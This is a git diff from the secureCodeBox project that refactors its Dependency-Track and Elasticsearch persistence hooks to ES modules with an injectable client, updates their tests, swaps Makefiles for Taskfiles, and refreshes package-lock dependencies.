const scan = { + metadata: { + uid: "a30122a6-7f1a-4e37-ae81-2c25ed7fb8f5", + name: "demo-sbom", + }, + status: { + rawResultType: "sbom-cyclonedx", + }, + }; + + const apiKey = "verysecretgitleaksplsignore"; + const baseUrl = "http://example.com/foo/bar"; + const url = baseUrl + "/api/v1/bom"; + + await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); + + expect(fetch).toBeCalledTimes(1); + expect(fetch).toBeCalledWith( + url, + expect.objectContaining({ + method: "POST", + headers: { + "X-API-Key": apiKey, + }, + }), + ); + + expect(fetch.mock.calls[0][1].body.get("projectName")).toBe(name); + expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe(version); + }, +); diff --git a/hooks/persistence-dependencytrack/hook/package-lock.json b/hooks/persistence-dependencytrack/hook/package-lock.json deleted file mode 100644 index 557a567405..0000000000 --- a/hooks/persistence-dependencytrack/hook/package-lock.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "license": "Apache-2.0" - } - } -} diff --git a/hooks/persistence-dependencytrack/hook/package-lock.json.license b/hooks/persistence-dependencytrack/hook/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-dependencytrack/hook/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-dependencytrack/hook/package.json b/hooks/persistence-dependencytrack/hook/package.json deleted file mode 100644 index b0a7fc4f49..0000000000 --- a/hooks/persistence-dependencytrack/hook/package.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "description": "secureCodeBox hook to persist CycloneDX SBOMs to Dependency-Track.", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook", - "dependencytrack", - "persistence" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0" -} diff --git a/hooks/persistence-dependencytrack/hook/package.json.license b/hooks/persistence-dependencytrack/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-dependencytrack/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-elastic/Makefile b/hooks/persistence-elastic/Makefile deleted file mode 100644 index d8c56c7577..0000000000 --- a/hooks/persistence-elastic/Makefile +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-elastic - -include ../../hooks.mk - -.PHONY: docker-build -docker-build: dashboard-importer-docker-build - -.PHONY: docker-export -docker-export: dashboard-importer-docker-export - -.PHONY: kind-import -kind-import: dashboard-importer-kind-import - -.PHONY: dashboard-importer-docker-build -dashboard-importer-docker-build: - @echo ".: ⚙️ Build '$(name)' dashboard-importer with BASE_IMG_TAG: '$(BASE_IMG_TAG)'." - docker build \ - --build-arg=scannerVersion=$(shell yq e .appVersion ./Chart.yaml) \ - --build-arg=baseImageTag=$(BASE_IMG_TAG) \ - --build-arg=namespace=$(IMG_NS) \ - -t $(IMG_NS)/$(name)-dashboard-importer:$(IMG_TAG) \ - -f ./dashboard-importer/Dockerfile \ - ./dashboard-importer - -.PHONY: dashboard-importer-docker-export -dashboard-importer-docker-export: - @echo ".: ⚙️ Saving new docker image archive to '$(name)-dashboard-importer.tar'." - docker save $(IMG_NS)/$(name)-dashboard-importer:$(IMG_TAG) -o $(name)-dashboard-importer.tar - -.PHONY: dashboard-importer-kind-import -dashboard-importer-kind-import: - @echo ".: 💾 Importing the image archive '$(name)-dashboard-importer.tar' to local kind cluster." - kind load image-archive ./$(name)-dashboard-importer.tar --name $(KIND_CLUSTER_NAME) - -.PHONY: deploy -deploy: ## 💾 Deploy this module via HelmChart into namespace "integration-tests" - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) . --debug --timeout 5m --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="dashboardImporter.image.tag=$(IMG_TAG)" diff --git a/hooks/persistence-elastic/Taskfile.yaml b/hooks/persistence-elastic/Taskfile.yaml new file mode 100644 index 0000000000..b652974104 --- /dev/null +++ b/hooks/persistence-elastic/Taskfile.yaml @@ -0,0 +1,12 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-elastic diff --git a/hooks/persistence-elastic/hook/Dockerfile b/hooks/persistence-elastic/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/persistence-elastic/hook/Dockerfile +++ b/hooks/persistence-elastic/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js b/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js deleted file mode 100644 index 2bc8a1c1e9..0000000000 --- a/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js +++ /dev/null @@ -1,21 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -class Client { - constructor() { - this.indices = { - create: jest.fn(), - }; - this.index = jest.fn(); - this.bulk = jest.fn(async () => { - return { - body: { - errors: false, - }, - }; - }); - } -} - -module.exports.Client = Client; diff --git a/hooks/persistence-elastic/hook/hook.js b/hooks/persistence-elastic/hook/hook.js index 2001645874..e9ea8077e6 100644 --- a/hooks/persistence-elastic/hook/hook.js +++ b/hooks/persistence-elastic/hook/hook.js @@ -2,12 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const { Client } = require("@elastic/elasticsearch"); - -const flatMap = require("lodash.flatmap"); -const chunk = require("lodash.chunk"); - -const { DateTime } = require("luxon"); +import { Client } from "@elastic/elasticsearch"; +import { flatMap, chunk } from "lodash-es"; +import { DateTime } from "luxon"; const authParams = {}; @@ -36,12 +33,7 @@ if (apiKeyId && apiKey) { ); } -const client = new Client({ - node: process.env["ELASTICSEARCH_ADDRESS"], - ...authParams, -}); - -async function handle({ +export async function handle({ getFindings, scan, now = new Date(), @@ -50,6 +42,10 @@ async function handle({ indexSuffix = process.env["ELASTICSEARCH_INDEX_SUFFIX"] || defaultDateFormat, appendNamespace = process.env["ELASTICSEARCH_INDEX_APPEND_NAMESPACE"] || false, + client = new Client({ + node: process.env["ELASTICSEARCH_ADDRESS"], + ...authParams, + }), }) { const findings = await getFindings(); @@ -117,5 +113,3 @@ async function handle({ } } } -module.exports.elasticClient = client; -module.exports.handle = handle; diff --git a/hooks/persistence-elastic/hook/hook.test.js b/hooks/persistence-elastic/hook/hook.test.js index e94c9a340f..08b5e7b16e 100644 --- a/hooks/persistence-elastic/hook/hook.test.js +++ b/hooks/persistence-elastic/hook/hook.test.js @@ -2,11 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle, elasticClient } = require("./hook"); +import { handle } from "./hook"; + +let elasticClient; beforeEach(() => { - elasticClient.index.mockClear(); - elasticClient.bulk.mockClear(); + elasticClient = { + indices: { + create: jest.fn(), + }, + index: jest.fn(), + bulk: jest.fn(() => ({ body: {} })), + }; }); const scan = { @@ -36,10 +43,11 @@ test("should only send scan summary document if no findings are passing in", asy now: testDate, tenant: "default", appendNamespace: true, + client: elasticClient, }); - expect(elasticClient.index).toBeCalledTimes(1); - expect(elasticClient.index).toBeCalledWith({ + expect(elasticClient.index).toHaveBeenCalledTimes(1); + expect(elasticClient.index).toHaveBeenCalledWith({ body: { "@timestamp": testDate, id: "09988cdf-1fc7-4f85-95ee-1b1d65dbc7cc", @@ -53,7 +61,7 @@ test("should only send scan summary document if no findings are passing in", asy }, index: `scb_default_2020-11-11`, }); - expect(elasticClient.bulk).not.toBeCalled(); + expect(elasticClient.bulk).not.toHaveBeenCalled(); }); test("should send findings to elasticsearch with given prefix", async () => { @@ -74,10 +82,11 @@ test("should send findings to elasticsearch with given prefix", async () => { tenant: "default", indexPrefix: "myPrefix", appendNamespace: true, + client: elasticClient, }); - expect(elasticClient.index).toBeCalledTimes(1); - expect(elasticClient.index).toBeCalledWith({ + expect(elasticClient.index).toHaveBeenCalledTimes(1); + expect(elasticClient.index).toHaveBeenCalledWith({ body: { "@timestamp": testDate, id: "09988cdf-1fc7-4f85-95ee-1b1d65dbc7cc", @@ -92,8 +101,8 @@ test("should send findings to elasticsearch with given prefix", async () => { index: `myPrefix_default_2020-11-11`, }); - expect(elasticClient.bulk).toBeCalledTimes(1); - expect(elasticClient.bulk).toBeCalledWith({ + expect(elasticClient.bulk).toHaveBeenCalledTimes(1); + expect(elasticClient.bulk).toHaveBeenCalledWith({ refresh: true, body: [ { @@ -123,7 +132,13 @@ test("should not append namespace if 'appendNamespace' is null", async () => { const getFindings = async () => findings; - await handle({ getFindings, scan, now: testDate, tenant: "default" }); + await handle({ + getFindings, + scan, + now: testDate, + tenant: "default", + client: elasticClient, + }); expect(elasticClient.index).toBeCalledTimes(1); expect(elasticClient.index).toBeCalledWith({ @@ -153,6 +168,7 @@ test("should append date format yyyy", async () => { now: testDate, tenant: "default", indexSuffix: "yyyy", + client: elasticClient, }); expect(elasticClient.index).toBeCalledTimes(1); @@ -183,6 +199,7 @@ test("should append week format like yyyy/'W'W -> 2020/W46", async () => { now: testDate, tenant: "default", indexSuffix: "yyyy/'W'W", + client: elasticClient, }); expect(elasticClient.index).toBeCalledTimes(1); diff --git a/hooks/persistence-elastic/hook/package-lock.json b/hooks/persistence-elastic/hook/package-lock.json index b8166cd282..e8d449db22 100644 --- a/hooks/persistence-elastic/hook/package-lock.json +++ b/hooks/persistence-elastic/hook/package-lock.json @@ -10,6308 +10,1368 @@ "license": "Apache-2.0", "dependencies": { "@elastic/elasticsearch": "^8.18.2", - "lodash.chunk": "^4.2.0", - "lodash.flatmap": "^4.5.0", - "luxon": "^3.6.1" + "lodash-es": "^4.17.21", + "luxon": "^3.7.1" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "node_modules/@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { - "node": ">=6.0.0" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, + "node_modules/@elastic/elasticsearch": { + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", + "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", + "license": "Apache-2.0", "dependencies": { - "color-convert": "^1.9.0" + "@elastic/transport": "^8.9.6", + "apache-arrow": "18.x - 19.x", + "tslib": "^2.4.0" }, "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, + "node_modules/@elastic/transport": { + "version": "8.9.6", + "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", + "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "@opentelemetry/api": "1.x", + "debug": "^4.4.0", + "hpagent": "^1.2.0", + "ms": "^2.1.3", + "secure-json-parse": "^3.0.1", + "tslib": "^2.8.1", + "undici": "^6.21.1" }, "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" + "@types/node": "*", + "jest-regex-util": "30.0.1" }, "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.9.tgz", - "integrity": "sha512-5UamI7xkUcJ3i9qVDS+KFDEK8/7oJ55/sJMB1Ge7IEapr7KfdfV/HErR+koZwOfd+SgtFKOKRhRakdg++DcJpQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.9.tgz", - "integrity": "sha512-G2EgeufBcYw27U4hhoIwFcgc1XU7TlXJ3mv04oOv1WCuo900U/anZSPzEqNjwdjgffkk2Gs0AN0dW1CKVLcG7w==", + "node_modules/@jest/pattern/node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.9", - "@babel/helper-compilation-targets": "^7.22.9", - "@babel/helper-module-transforms": "^7.22.9", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.1" - }, + "license": "MIT", "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { + "node_modules/@opentelemetry/api": { "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", + "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==", + "license": "Apache-2.0", "engines": { - "node": ">=6.9.0" + "node": ">=8.0.0" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.9.tgz", - "integrity": "sha512-7qYrNM6HjpnPHJbopxmb8hSPoZ0gsX8IvUS32JGVoy+pU9e5N0nLr1VjJoR6kA4d9dmGLxNYOjeB8sUDal2WMw==", - "dev": true, + "node_modules/@swc/helpers": { + "version": "0.5.17", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", + "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", + "license": "Apache-2.0", "dependencies": { - "@babel/compat-data": "^7.22.9", - "@babel/helper-validator-option": "^7.22.5", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "tslib": "^2.8.0" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@types/command-line-args": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", + "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==", + "license": "MIT" + }, + "node_modules/@types/command-line-usage": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", + "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==", + "license": "MIT" + }, + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.9.tgz", - "integrity": "sha512-t+WA2Xn5K+rTeGtC8jCsdAH52bjggG5TKRuRrAGNM/mjIbO4GxvlLMFOEz9wXY5I2XQ60PMFsAG2WIcG82dQMQ==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@jest/get-type": "30.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + 